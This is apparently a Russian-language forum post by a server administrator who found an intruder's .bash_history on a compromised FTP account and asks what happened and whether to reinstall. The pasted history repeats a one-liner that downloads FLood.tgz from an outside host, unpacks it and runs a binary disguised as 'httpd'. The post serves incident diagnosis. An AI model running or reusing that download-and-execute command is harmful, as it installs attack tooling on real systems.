RedHat 2.6.18-194.el5
Сервер http, vsftpd, почта.
Пытался войти на FTP по авториз. доступу (vsftpd) - не пустил, не верный пароль.
Выставил учетке пароль заново, вошел на FTP и увидел файл .bash_history:
--------------
passwd
w
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd /var/tmp
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
curl -O
ls -a
ps x
cd /var/tmp
wget
uptime
cd /tmp
ls -a
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd
ls -a
ls -a
cd mc-root
chmod +x *
PATH="."
httpd
cd
rm -rf mc-root
--------------
Пользователь принадлежит группе ftp, но оболочка была прописана /bin/bash (это упущение). Пароль был простой.
/etc/passwd остался не тронут.
Я плохо в этом разбираюсь. Скажите пожалуйста, что это было? Сам человек ломал или какой вирус? Я так понял, с ресурса был загружен архив и распакован.
И что за повторения «httpd»?
Скажите, мог ли хакер получить доступ к папкам, расположенным выше своей?
Стоит ли теперь переустанавливать? Образ есть.